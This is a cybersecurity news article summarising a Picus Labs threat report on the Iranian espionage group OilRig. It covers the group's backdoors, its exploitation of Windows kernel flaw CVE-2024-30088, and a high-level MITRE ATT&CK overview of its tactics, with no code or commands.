CVE-2024-30088 Under Attack: OilRig Targets Windows Kernel Vulnerability
Renowned for cyber espionage activities targeting critical sectors in the Middle East, OilRig, also known as APT34 or Helix Kitten operates with precision, exploiting vulnerabilities and employing advanced techniques to achieve its geopolitical objectives.
In its latest report, Picus Labs delves deep into the operations of this Iranian state-sponsored actor. The report highlights OilRig’s evolution, its historical campaigns, and the advanced tactics it uses.
OilRig emerged in the cyber threat landscape in 2016, with some evidence suggesting earlier activities. Initially targeting Saudi Arabian organizations through spearphishing campaigns and the deployment of the Helminth backdoor, the group quickly demonstrated a capacity for long-term persistence and stealth. “OilRig has risen to prominence with its strategic use of the Helminth backdoor, an advanced malware tool that enabled stealthy, sustained access to targeted systems,” the report notes.
Over the years, OilRig has expanded its reach across the Middle East, targeting government entities, energy sectors, and technology providers. Its tools have evolved, from the early Helminth malware to more sophisticated payloads like QUADAGENT and ISMAgent. These backdoors, coupled with open-source obfuscation tools like Invoke-Obfuscation, reflect the group’s adaptability and technical expertise.
The report outlines how OilRig incorporates zero-day and recently disclosed vulnerabilities into its arsenal, including the exploitation of CVE-2024-30088. This Windows Kernel vulnerability allowed OilRig to gain SYSTEM-level access, enabling it to deploy its custom STEALHOOK backdoor for prolonged monitoring and data exfiltration.
OilRig has also targeted supply chains, using compromised accounts within technology providers to launch broader attacks. The 2018 QUADAGENT campaign exemplified this strategy, leveraging PowerShell-based malware to infiltrate government and corporate networks, often undetected.
Picus Labs provides a detailed overview of OilRig’s tactics, techniques, and procedures (TTPs) through the MITRE ATT&CK framework. Among the highlights:
- Initial Access: OilRig excels in spearphishing campaigns, often masquerading as trusted contacts on platforms like LinkedIn to harvest credentials.
- Execution: The group relies on PowerShell and other scripting tools for stealthy command execution within compromised environments.
- Persistence: Scheduled tasks and obfuscated payloads ensure continuous access, even after partial remediation efforts.
- Defense Evasion: Advanced obfuscation techniques, including base64 encoding and Invoke-Obfuscation, allow OilRig to bypass detection systems.
- Credential Access: Tools like Mimikatz and LaZagne enable the extraction of plaintext credentials from password stores and memory dumps.
- Exfiltration: OilRig employs alternative protocols, such as FTP and DNS tunneling, to extract sensitive data while evading monitoring systems.
The Picus Labs report provides a comprehensive overview of OilRig’s TTPs, mapping them to the MITRE ATT&CK framework. This detailed analysis offers valuable insights for organizations seeking to defend against this persistent threat.
Related Posts:
- C&C in the Clouds: OilRig Group Hijacks Microsoft Services for Espionage
- APT group OilRig targets Middle Eastern countries
- Iranian hacker group OilRig uses a new Trojan OopsIE in the recent attacks
- Iran APT organizations use new RGDoor Backdoor to attack Middle Eastern government organizations and financial and educational institutions
- A New Set of Tools for Cyber Espionage: Targeting the Middle East, Africa, and the US